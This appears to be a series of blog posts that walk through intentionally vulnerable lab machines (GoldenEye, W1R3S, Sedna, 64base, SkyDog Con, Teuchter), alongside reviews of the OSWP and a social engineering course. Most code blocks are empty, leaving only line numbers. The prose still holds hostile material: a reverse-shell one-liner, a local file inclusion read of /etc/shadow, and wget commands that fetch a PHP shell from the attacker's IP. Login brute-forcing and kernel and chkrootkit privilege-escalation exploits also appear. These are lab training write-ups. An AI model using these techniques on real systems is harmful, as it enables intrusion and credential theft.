1 2 3 4 5 6 7 8 9 10 11 |
|
I recently got done creating an OSCP type vulnerable machine that’s themed after the great James Bond film (and even better n64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes – flag.txt.
I’d rate it as Intermediate, it has a good variety of techniques needed to get root – no exploit development/buffer overflows. After completing the OSCP I think this would be a great one to practice on, plus there’s a hint of CTF flavor.
1 2 3 4 5 6 7 8 9 10 11 12 |
|
Navigating to the web server takes you to this screen:
In the source code of the page there’s a linked terminal.js file. Viewing that reveals some interesting comments:
1 2 3 4 5 6 7 8 9 10 11 |
|
So we have a HTML encoded password which decodes to InvincibleHack3r
. Now we can go to /sev-home and log in as boris with this password.
We can now make use of that POP3 service on port 55007. Boris’ credentials didn’t work though. I used Nikto to further look at the web server and got an interesting hit:
1
|
|
Going to that page wasn’t immediately useful though, but maybe some of the information could be used further:
With nothing else to go from, I attempted to bruteforce the mail login credentials for boris with the Metasploit scanner/pop3/pop3_login module and the fasttrack.txt wordlist:
1
|
|
So now we have credentials for Boris’ mail and I was able to read his mails:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
|
We now know to look for access codes once we get a shell on the target. We also learned there’s another username on the ubuntu domain: natalya. So I kicked off the bruteforce for her account as well, this time with Hydra, because I wasn’t happy with the speed of the Metasploit module.
1 2 |
|
Got lucky with natalya as well. Now back to reading emails:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 |
|
Now we’ve learned some interesting things..it seems Boris is a double agent! We now have a new set of credentials: xenia:RCP90rulez!
and the internal domain for which we have to add an entry in our hosts file. With that done, going to the URL took me to a training portal:
We can log in as Xenia and find a message on the platform:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
|
We have a new mail username and by now we know what’s coming..
1
|
|
There’s only one mail, but it contains portal credentials:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
|
Look around until you find a secret file inside My private files:
The contents are:
1 2 3 4 5 6 7 8 9 |
|
The image most likely has hidden data within:
Running strings on the image reveals a base64 string: eFdpbnRlcjE5OTV4IQ==, which is decoded to xWinter1995x!
. Now we can log in as admin to the platform. After some more recon, it seems that we can achieve RCE with a Metasploit exploit for Moodle:
Moodle allows an authenticated user to define spellcheck settings via the web interface. The user can update the spellcheck mechanism to point to a system-installed aspell binary. By updating the path for the spellchecker to an arbitrary command, an attacker can run arbitrary commands in the context of the web application upon spellchecking requests. This module also allows an attacker to leverage another privilege escalation vuln. Using the referenced XSS vuln, an unprivileged authenticated user can steal an admin sesskey and use this to escalate privileges to that of an admin, allowing the module to pop a shell as a previously unprivileged authenticated user. This module was tested against Moodle version 2.5.2 and 2.2.3.
The admin account we hijacked has the necessary privileges, so we can use this exploit.
1 2 3 4 5 6 7 8 9 10 11 12 13 |
|
It seemed straightforward, but the exploit failed to run for me. I looked over the source code and saw that the spellcheck engine that is set by the exploit is PSpellShell. By default on the site, the TinyMCE HTML editor spell engine selected was Google Spell. So I manually changed this and ran the exploit again, but it still didn’t work. So I did it manually. Recall this part:
By updating the path for the spellchecker to an arbitrary command, an attacker can run arbitrary commands in the context of the web application upon spellchecking requests
Under Server –> System paths, I edited the Path to aspell field with this reverse shell one-liner (had to cycle through a couple before finding one that worked): sh -c ‘(mknod /tmp/backpipe p 2> /dev/null && /bin/bash 0/tmp/backpipe &)’
Now if you go to Blogs and add a new entry, you can invoke the spellchecker by clicking on the spellcheck button:
And you should receive a shell on your listener. I upgraded it to a proper one:
1 2 3 4 5 6 7 |
|
The kernel version is really old:
1 2 |
|
I used the overlayfs exploit. There was no GCC on the box, but remember that webpage that mentioned clang. I compiled the exploit with clang: clang 37292.c
. There were 5 warnings generated, but an executable a.out was generated. However, it didn’t give me a root shell. When I looked through the exploit source code, I found a gcc reference:
1
|
|
Replacing gcc with cc (the default compiler) in this line and recompiling the code worked and I got root. Then I found the secret codes inside a hidden file in /root:
1 2 3 4 5 6 7 8 |
|
Visit that path on the web server and mission accomplished!
1 2 3 4 5 6 7 8 9 |
|
The course consists of PDF material, videos, a BackTrack ISO and packet captures. The labs are hardware dependent, so you are supposed to procure your own hardware in order to practice the attacks. For my wireless card, I’ve used Alfa AWUS036NHA and have been very happy with its performance. In the course, BackTrack is being used as the operating system, but I’ve done the labs on Kali with minimal to none difference in commands.
As a testimony to the applicability of what you learn in the course, the author is none other than Thomas d’Otreppe de Bouvette, the creator of the Aircrack-NG suite! The material is very well structured and explained, you can practice what you’re taught and see immediate results. Most chapters also contain a troubleshooting section with tips on what to try if you run into problems.
Almost half of the course written material revolves around the description of Wifi internals, how it works, how packets look like, hardware and drivers consideration. There are PCAP examples for what is being discussed, and it is really useful if you want to understand what is happening under the hood.
After that, it’s all attacks and the stuff we’re interested in! The focus of the course materials is the Aircrack-NG suite of tools, as expected, since it’s the de facto choice for wireless security auditing. You learn how to place your wifi card on monitor mode, how to sniff traffic, how to do packet injection and ultimately crack the keys for different network scenarios. You also learn how to find hidden SSIDs and bypass MAC filtering.
The attacks you perform are targeted at different network types. There are multiple scenarios for WEP networks that use open authentication, shared key authentication, or have no associated clients. The labs go over multiple attacks: interactive packet replay attacks, fragmentation attacks, KoreK ChopChop attacks.
The most applicable part is the WPA/WPA2 cracking section, as these are the networks you’ll run into most often nowadays. Dictionary and rainbow table attacks are being demonstrated with multiple tools. I’ve really enjoyed the addition in the course material of Cowpatty and Pyrit. Also, you’re shown how to leverage John’s rules to enhance an already existing wordlist that’s used with Aircrack-NG.
At the end of the course, you also get to see Kismet and Karmetasploit in action, along with rogue AP and man-in-the-middle attacks.
The exam was really enjoyable, I didn’t find it too hard or too easy. If you practice the labs in the course, you will be well prepared for the exam. I really liked that the exam takes almost 4 hours, as that allowed me to also work on the report as I was going through each attack. I’ve experienced some laggy bits and a disconnection here and there, but overall, the exam experience was great.
I could think of no better course for wireless hacking, but as I was reading reviews of other people’s experiences, I saw some criticism concerning this particular course. I will share my thoughts on the critiques below.
The course is outdated. It looks like the course was last updated in 2014, and the videos and labs make use of BackTrack. But these don’t detract from its value at all. I used Kali for the course, and I think only 2 times I had to slightly alter the commands for use on Kali. It would make no sense to re-record everything just to be on Kali, since there are almost no differences between them. Also, the wifi landscape hasn’t changed that much, so the material is highly relevant and you can put into practice what you learn right away. But I do agree that the course would be even better with a section of WPA enterprise attacks and WPS cracking.
The material is too WEP-centric. It’s true that today you won’t really see WEP that much. But that’s not to say that there are no WEP networks left in the world. Seeing how vulnerable they are in reality and being able to crack different types of WEP networks is a skill that you should have, regardless of how rare you’ll get to see them. So for me, this wasn’t a weak point at all, I found it very interesting.
The exam is too easy. I’ve also seen several opinions claiming that the exam was too easy. But this only attests to the quality of the material, if you can perform the attacks you’re being taught, you will succeed. Maybe as an enhancement to the exam, besides cracking the keys, there could be some objectives like decrypting the traffic of a certain client to discover something, or performing MitM. But I was happy with the quality of the exam, in fact, I tried to make the most of it by going through the attacks with more than one tool.
All in all, OSWP was awesome, and stay tuned for more!
1 2 3 4 5 6 7 8 9 10 |
|
The machine description is the following:
1 2 3 4 5 6 7 |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
|
The immediate points of interest are the FTP server, and the web server. Since Nmap only found the Apache default page, I started some background enumeration with Gobuster:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
|
Ok, we have some web directories to check..a possible Wordpress installation, a MySQL database and an FTP server that we can login to.
Logging in to the FTP server, we see the following directories:
1 2 3 4 |
|
I downloaded them to my machine with wget -r ftp://ftp:anonymous@192.168.145.134/
. Inside the content folder there are 3 text files, and one of them contains potentially interesting data:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 |
|
I used an online MD5 hash cracker to get the value This is not a password
. And the base64 string gave the message that It is easy, but not that easy..
. So there are probably red herrings, let’s move on.
Inside docs there’s a text file with some upside down text:
1 2 3 4 |
|
Used an online converter to flip this and reverse it for the text:
1 2 |
|
This is also useless..The final piece gives us some names that we might be able to use later:
1 2 3 4 5 6 7 8 9 |
|
This is all the information we got from the FTP vector. Let’s return to the web server now. The javascript folder was forbidden for viewing, and the wordpress folder redirected to localhost/wordpress, so I had to modify my /etc/hosts
file:
1
|
|
Now I could get to the Wordpress blog, which looks to be under construction:
I decided to go with an alternate Wordpress scanner for this one, so instead of WPScan, I went with WPSeku
WPSeku – Wordpress Security Scanner
WPSeku is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations to find security issues.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
|
Ran it against the target:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 |
|
Nothing evidently exploitable in the scan results, so I turned to the /administrator folder on the web server and got to the configuration screen of a Cuppa CMS:
Couldn’t proceed with the configuration because I didn’t have enough information:
I’ve never heard of this CMS before, I ran a quick searchsploit and got a hit:
1 2 3 4 5 6 7 |
|
Let’s see what this is about:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 |
|
I tried the LFI, but all I got was a blank page in return. So I attempted this with curl, and got served the passwd file:
1 2 3 4 |
|
Now we have a valid user on the system and we can read arbitrary files. Because the root user was prepopulated in the installation page, I tried reading the /etc/shadow file and…succeeded!
1 2 3 |
|
That was a lucky break! I put the hashes for root and w1r3s in a file to be cracked by John the Ripper and immediately got a password:
1 2 3 4 5 6 7 8 |
|
With this, I could SSH in.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
|
One of the things I picked up from watching Ippsec videos was to check the sudo privileges early on:
1 2 3 4 5 6 7 8 |
|
That tops the misconfiguration list! Our user has unlimited sudo privileges!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 |
|
The exploitation chain was as follows:
Until next time!
1 2 3 4 5 6 7 8 9 |
|
There are 4 flags on this machine One for a shell One for root access Two for doing post exploitation on Sedna
Alrighty, let’s hack the planet!
Plenty of open ports:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 |
|
Hit a couple of walls with the first enumeration attempts. The robots.txt has a Hackers entry that doesn’t lead anywhere. Nothing usable for the bind server and the OpenSSH. enum4linux came back empty because I had no username/password pair to specify. And the Tomcat server did not use default credentials. So I fired up Gobuster and it found some additional things to check:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
|
I visited each link, there are lots of directory listings for what appears to be a blog and ecommerce application. Some directories blocked me from entering, but I did find an indication of the target application inside http://192.168.145.128/themes/default_theme_2016/description.txt
1
|
|
Searching for BuilderEngine exploits gave me 2 results, 1 exploitDB exploit and 1 Metasploit module. Let’s see both in action, starting with Metasploit!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
|
Ran it and got a Meterpreter shell:
1 2 3 4 5 6 7 8 9 |
|
The kernel is old, so plenty of privilege escalations should be available:
1 2 3 4 5 6 7 8 9 10 |
|
I used Searchsploit to look for Ubuntu 14.04 exploits and went with the 37292.c overlayfs exploit/ I downloaded it to the machine, compiled it, ran it..and surprise, no root! I also tried the Apport exploit, still no luck. While looking around though, I did find the low privilege flag:
1 2 |
|
Before continuing with rooting the machine, I went back getting a shell without Metasploit.
Here’s the ExploitDB variant of arbitrary file upload:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
|
I created a HTML file with the above code, changing localhost to the Sedna IP. Then I used it to upload a reverse shell:
Then I went to http://192.168.145.128/files/shell.php and got the shell on my Netcat listener. Back to searching for ways to get root. I also find a possible post-exploitation flag in /etc/passwd:
1
|
|
Cracking the password for this user might be another flag, but first I need root. Since the exploits I’ve tried so far didn’t work, I decided to go down the dirtycow route. Unfortunately, that didn’t work either, besides crashing the kernel. Well, I did not expect for so many privilege escalation exploits to fail.
The solution came from something unexpected..and that needed a less targeted enumeration..more like generally looking around the box. Inside /etc, I noticed chkrootkit was present. I searched for available exploits and found a privilege escalation one:
1 2 3 4 5 6 7 8 9 |
|
The exploit is available for version 0.49, so let’s see what version is on the box:
1 2 3 |
|
Perfect! I decided to use Metasploit for this, I kept getting errors in my shell related to previous overlayfs attempts. But the way to do it manually is to put an executable file called update with content of your choice in /tmp and wait for chkrootkit to run it as root.
Metasploit came through and finally, I got root:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 |
|
Got the root flag:
1 2 |
|
It was not over though, there should be one more flag, so I remembered the Tomcat server and looked inside /etc/tomcat7/tomcat-users.xml
to find the username and password for Tomcat:
1
|
|
I didn’t want to crack the password for the 4th flag, so I decided to call it a day at ¾ flags.
1 2 3 4 5 6 7 8 9 10 11 12 |
|
First of all, the author of the course is also the founder of RedTeam Security, Jeremiah Talamantes. He’s authored a book called The Social Engineer’s Playbook: A Practical Guide to Pretexting , which I haven’t tried yet. He is clearly very experienced and throughout the course, he’s sharing various stories from the operations he’s conducted.
The course is priced at 59$, but there are discounts every now and then. The training is video-based, where the instructor is sharing slides and talking about the topics. There are some valuable documents that can be downloaded, mainly templates and sample models for social engineering reports, plans and field notes guides. These can be used as starting points for your own operations.
As for the main structure of the course, it is as follows:
Introduction to social engineering – this covers the terminology around SE (it’s getting tiring to type that) and goes through several examples
Attack vectors – very useful section for actually conducting a SE campaign, it goes over different techniques and tools for social engineering your target, with actionable tips that you can use right away to enhance your operations. It also summarizes an attack in a very clear way, through the Social Engineering Kill Chain
Methodology – this is another very practical section that covers planning and execution.
Information gathering – physical and digital techniques for information gathering. There is a gear list for physical reconaissance that makes for a good reference. However, I found the digital side to be under-represented, only Maltego and Metagoofill are discussed. I would have expected at least a breakdown of the SET functionality, and more demos about OSINT and conducting phishing campaigns.
Psychology & manipulation – very applicable in day-to-day life, not limited to the field of security and SE, this describes various influencing and elicitation techniques that can be used to gain information or an expected behavior from a target. Not only that, but it also gives you awareness of such techniques being used on you.
Non-verbal communicaton – this is where micro expressions and body language are discussed. It essentially gives you a roadmap for reading people’s true feelings and intentions, detecting lies, and masking your own thoughts. Very practical to be aware of these thing in all kinds of settings and social interactions.
All in all, I’ve really enjoyed this course and highly recommend it. What would have made it even better would have been a practical component in order to complete it, a lab or task around phishing / OSINT, especially since at the end you get a certification. That being said, this is a very solid course and you don’t need to be social engineered to get it :D
1 2 3 4 5 6 7 8 9 |
|
You are looking for two flags. Using discovered pointers in various elements of the running web application you can deduce the first flag (a downloadable file) which is required to find the second flag (a text file). Look, read and maybe even listen. You will need to use basic web application recon skills as well as some forensics to find both flags.
1 2 3 4 5 |
|
There is just one page for the web server:
There is some peculiar Javascript in the source:
1 2 3 |
|
I used an online JS beautifier to deobfuscate this to a hex string, which I then decoded to alert(‘mulder.fbi’);
. This name is familiar to me from the X-Files. Anyway, not sure about its relevance for now. Moving on with the information gathering, since nothing came out of Nikto or Gobuster, I browsed the page in Burp, and noticed a strange cookie being set:
1
|
|
URL decoding this gave me the value /v/81JHPbvyEQ8729161jd6aKQ0N4/
Tried browsing to this and got a 403 Forbidden error. There is some piece of the puzzle missing..so I took the next step and downloaded all the images and ran them through exiftool..and finally got some luck with the Challenge.png image, which had a hex comment:
1
|
|
Had to hex-decode this 2 times to get a base64 string: QSFWdX5qdEgjNzI5c0xBO2g0JQ==, which I decoded to A!Vu~jtH#729sLA;h4%
. This looks like a password, but where to use it?
With the hints from the description, knowing that a file will need to be downloaded, I treated mulder.fbi as a file and tried appending it to the URL path that gave me a forbidden error: http://192.168.145.141/v/81JHPbvyEQ8729161jd6aKQ0N4/mulder.fbi
That actually worked and I downloaded the file, which is apparently an MP4:
1 2 |
|
This is a song by The Platters. Since I couldn’t use steghide on a video, I googled for MP4 steganography and found this Lifehacker article about embedding a TrueCrypt volume in a video. I installed Veracrypt and used it to mount the file as a volume, in TrueCrypt mode. At the password prompt, I used the string that I’ve decoded earlier, and it served me the volume, with a file called Flag.txt inside!
1 2 3 4 5 6 7 8 |
|
The main takeaways from this challenge for me were the steganography possibilities for video files. Until next time!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
|
The first red herring is SSH on port 22. If you try connecting to it, it looks like it gives you a root shell, and then it closes the connection. There is no SSH there:
1 2 3 4 5 6 7 8 9 10 11 12 |
|
Then there is port 4899, which shows some ASCII art, but nothing seems to happen otherwise:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
|
The web server takes us to Lord Vader’s blog:
You probably noticed that weird string, dmlldyBzb3VyY2UgO0QK. If you look in the HTML source, you will find a comment following it:
1
|
|
It’s hex encoded, and decoding it gives a…I’m sure you expect it by now…base64 string:
1
|
|
Decoding this gives the 1st flag: flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==}
, and further decoding the flag leaves us with what look like credentials for something: 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4
If you browse the pages you can read some Star Wars centric posts. I didn’t go through them thoroughly, but I did notice a relevant hint in a picture for something that might come up later:
So..when we’ll reach the point of getting a shell, we’ll have to use system instead of exec. Cool..now it’s time to look inside that massive robots.txt. There are too many entries to show and the few I’ve tried were blank. Under /admin there’s basic authentication, but the credentials from the first flag didn’t work. Some attention to detail is required for this one. In the above picture, there is another important hint that I’ve overlooked: Only respond if you are a real Imperial-Class BountyHunter. Within the plethora of robots.txt entries there is this:
1
|
|
Useless like the others, but the message said Imperial-Class..could it be that one capital letter would make the difference? I tried http://192.168.145.138/Imperial-Class/ and another basic authentication box popped up, and this time the credentials worked!
It looks like a dead end, but the source is with us:
1
|
|
Adding this part to the URL (Imperial-Class/BountyHunter) takes us to a login page:
The force..source to the rescue again! If you view the source, you will notice another 3 hex strings:
1 2 3 |
|
Decoding them as a block gives us another base64 string:
1
|
|
And decoding this gives the second flag: flag2{aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=}
. But it’s the inside that matters, and it’s actually a link to Youtube
So we’ll have to use Burp for the next part.
I’ve put some dummy values in the login form and intercepted the requests with Burp..it’s important to also capture the server response, because the flag is in the 302 Moved Temporarily response from the server: flag3{NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=}
. And decoding it shows the way to the secret shell that was hinted at previously: 53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id
Going to http://192.168.145.138/Imperial-Class/BountyHunter/login.php?f=exec&c=id takes us to a page that only has the text “[64base Command Shell]” displayed on it. Trying different commands for the c parameter doesn’t change anything, but we have the tip from before. So I switched to ?f=system&c=id and got the flag and the command output:
1 2 3 4 5 6 7 8 9 10 |
|
Decoding the flag gives another set of possible credentials: 64base:64base5h377
. Tried them on the SSH with no success.
Even though it looks like we have a shell, in reality, many commands don’t work. At this point, I looked at a hint from other solutions to understand what is going on. It seems there is some filtering in place, and you can see what is being filtered by using PHP’s var_dump function, which displays structured information (type and value) about variables. I tried downloading a reverse shell from my system with ?f=system&c=wget http://192.168.145.133:8001/shell.php
, but of course it didn’t work. However, when I tried looking at how the command is constructed with ?f=var_dump&c=wget http://192.168.145.133:8001/shell.php
, I saw what was filtered out:
1 2 3 4 |
|
The slash and colon characters are filtered out. I played with it and saw that other special characters are also filtered out, so I couldn’t use command chaining to get rid of it. I could not point wget to my server that with the shell. But wget has the option of recursive downloading, with the -r switch. If I could serve the shell in the root of my web server, it should be recursively downloaded, since there would be no blacklisted characters in the command. So I used Python’s SimpleHTTPServer to serve the shell on port 80 and tested the recursive download from my machine, and it created a directory corresponding with the one downloaded, with the shell inside:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
|
I made the change and dumped the variable as it looks now:
1
|
|
Things are looking good. But when I ran it, still nothing happened, and there was no GET request downloading the shell on my Python server. After more time spent dumping variations of the command, the one that finally worked was ?f=system&c=ls | wget -r 192.168.145.133
Now my server received a request, and when I listed the current directory:
1 2 3 4 5 6 7 8 9 10 11 12 13 |
|
Navigating to http://192.168.145.138/Imperial-Class/BountyHunter/192.168.145.133/shell.php served me the shell on my listener:
1 2 3 4 5 6 7 8 9 10 |
|
I looked around and saw more ASCII art files, then I ran a quick search for the flag:
1 2 |
|
And the hint for the last flag is Look Inside! :D
.
Running file on the found file shows that it’s a JPEG image:
1
|
|
There is hex in the comment, I decoded it to LS0tLS1CRUdJTiBSU0EgUFJJVkFURSB
. Then I passed this through a base64 decoder and it gave me the beginning of an SSH private key:
1
|
|
I needed to take a better look at this, so I downloaded it to my machine:
And then I ran exiftool on it and the comment string was actually huge. So there must be a complete private key in there. So I went again through the hex and bas64 decoding process, to get the key:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
|
When trying to SSH with the key, I got prompted for a passphrase. I took a swing at it with the message from the image, usetheforce, and it was a win:
1 2 3 4 5 6 7 |
|
Almost over, because that flag required several decoding cycles before it gave me something usable: base64 -d /var/local/.luke|less.real
. With that, I ran it and got the mission success message, which will take a couple of minutes to read:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 |
|
1 2 3 4 5 6 7 8 9 10 11 12 |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
|
Starting with the web server, the web page is the homepage of the SkyDog con. Poking through the source, I found a suspicious comment:
1
|
|
Going to the above mentioned JS file, on the first line we find a hex string:
1
|
|
Decoded, it gives the first flag: flag{7c0132070a0ef71d542663e9dc1f5dee}
. And decoding the MD5 hash gives a hint: nmap
I already ran Nmap and saw that SSH is listening on port 22222. Trying to SSH as frank gives the next flag:
1 2 3 4 5 6 7 8 9 10 11 12 13 |
|
The decoded hint is encrypt
Remember that Nmap found also port 443 open, so I switched to https to check it out and was greeted by a self-signed certificate. Viewing the certificate gives the third flag: flag3{f82366a9ddc064585d54e3f78bde3221}
And the next hint is personnel
I tried navigating to /personnel on the web server and it gave me the following message:
1
|
|
So we need a specific user agent. Remembering the included JS file of the first flag, that hinted towards an old Internet Explorer version, I revisited it and searched for the string fbi inside it and found the lines:
1 2 |
|
So FBI agents use IE4 on their workstations. Cool, nothing catastrophically wrong there. I grabbed an IE4 user agent from http://www.useragentstring.com/pages/useragentstring.php?name=Internet+Explorer, changed my User Agent to User-Agent: Mozilla/4.0 WebTV/2.6 (compatible; MSIE 4.0)
, and went straight to the FBI portal!
The flag is on the page: flag{14e10d570047667f904261e6d08f520f}
, and the decoded value is evidence
Following up on the clue new+flag, I tried navigating to 192.168.145.136/newevidence and a basic authentication prompt asked me for credentials. On the FBI portal we have the message “Welcome Agent Hanratty”. A quick Google reveals that this is a reference to agent Carl Hanratty from the movie Catch Me If You Can. I went through the dialogue (hint hint) on the IMDB page to find out Carl’s daughter is called Grace (simple? guessable? personal?). I tried some combinations in the pop up until I found the right one is carl.hanratty/Grace (remember the naming convention of doug.perterson)
The flag is in the Evidence Summary File: flag{117c240d49f54096413dd64280399ea9}
. The hint is panam
For this one you have to work with the other 2 files from the page, the image and the PDF invoice. The invoice mentions an encryption consultation project:
This might suggest the use of steganography in the image, and this is confirmed if you search for Stefan Hetzl, it turns out he’s the author of steghide! And we have the previous hint of panam, which is the passphrase in this case:
1 2 3 4 5 6 7 8 |
|
This was a movie reference and I had to look it up in other solutions…“I’m The Fastest Man Alive!” is a reference to The Flash, whose real name is Barry Allen. For the next part, log in to SSH with the the username barryallen and the password iheartbrenda.
1 2 3 4 |
|
And the hint for the last flag is theflash
.
Inside barryallen’s home there’s a 72M ZIP file called security-system.data:
1 2 |
|
I transferred it to my machine with scp:
1 2 3 4 5 6 7 8 9 10 |
|
I unzipped the archive, but the file command didn’t identify it as something specific, it just said it’s data. I ran strings on it and saw various references to memory that seem to be linked to a Windows system. Time for some memory forensics with Volatility!
First, we need to identify what type of image we’re working with:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
|
It’s an image of a Windows XP machine! Next, let’s look at the processes:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 |
|
I took note of that Notepad process and several cmd.exes and then dumped the files:
1 2 3 4 5 6 7 8 |
|
I searched for the string code in the resulting list of files and got a hit:
1 2 3 4 5 |
|
Maybe this code.txt file is connected to the running Notepad process. I used Volatility’s notepad plugin to dump the text found into Notepad:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
|
We have a hex string! Decoding it yields the final flag: flag{841dd3db29b0fbbd89c7b5be768cdc81}
. And the decoded value for the last flag is Two[space]little[space]mice
This is it for the SkyDog Con CTF machine! I particularly liked the memory forensics part at the end!
1 2 3 4 5 6 7 8 9 |
|
So, what’s a Teuchter? The Wiktionary definition is:
(derogatory) A Highlander especially if Gaelic-speaking; a rural Scot in general; (in Glasgow and surrounding areas) a Scot with a thick accent from outside west-central Scotland.
Some hints from the author:
This VM is designed to be a bit of a joke/troll so a translator might be useful.
The challenge isn’t over with root. I’ve done my usual flag shenanigans.
A bit of info security research and knowing yer target helps here.
http://www.jackiestewart.co.uk/jokes/weegie%20windies%202000.htm
And this one:
Less hochmagandy and more studying is needed for this one!
Ah am sure ye have questions, so:
hochmagandy – Scottish a mainly jocular or literary word for sexual intercourse
Isn’t this a promising start..
Nothing much to start from, just a web server:
1 2 3 |
|
On the homepage there is just a GIF and a message:
Ran exiftool on the picture and found nothing. However, there are several comments in the source code:
1 2 3 |
|
Wullie seems to be the central character here..William? Wallace? We do have a Highlander reference above, and it fits the Scottish theme. While Ah was googling, Ah found this gem on the Urban Dictionary:
1 2 3 4 5 6 |
|
Let’s get back to the challenge, we have 3 potential web directories to check. In the meantime, Ah have Googled for .pht, since Ah have never seen that extension:
The pht file extension is associated with the Partial Hypertext file format.
The pht file stores HTML page that includes a PHP script, dynamically generates HTML, often by accessing database information.
PHT seems to be very little used format.
Mime types: application/x-httpd-php text/html
Back to the web server, /gallery/ is full of pictures, and the title is Dirty Foties..which Ah think stands for dirty feet. Because ye walk a lot..(someone needs some Irn-Bru)
There are more hints in the source code:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 |
|
North Kilttown is a Scottish town from The Simpsons. Ah searched for the word doolally, even though Ah got the gist from the context. From Wikipedia:
“Doolally”, originally “doolally tap”, meaning to ‘lose one′s mind’, derived from the boredom felt at the Deolali British Army transit camp.
The Urban Dictionary has another priceless definition for a glass cheque:
A Glaswegian term: Describes a special glass bottle, containing Irn-Bru, or other similar soft drink, available in many cornershops in Scotland. The bottle is returnable and currently attracts a 25p refund when ye give the bottle back to the shop. Called a cheque as they are often collected and cashed (like a cheque)by students and cheap bastards alike either to buy more Bru, or with enough bottles, some skag.
If ye’re not curious about what something called Irn-Bru is, ye’re a bawheid!
The ultimate hangover cure. Tastes best when consumed directly from a 750ml glass bottle.
Another one of Scotland’s many national identities.
Scotland is the only country in the world that produces a soft drink that outsells Coca Cola.
Ah must try some Irn-Bru! By the way, if ye were wondering, the “Wee hoose on the corner” is nothing spectacular…only the Edinburgh Castle! The Kelpies are 30-metre-high horse-head sculptures featuring kelpies…so what are kelpies? +1 to mythology skill:
Kelpie, or water kelpie, is the Scots name given to a shape-shifting water spirit inhabiting the lochs and pools of Scotland. It has usually been described as appearing as a horse, but is able to adopt human form
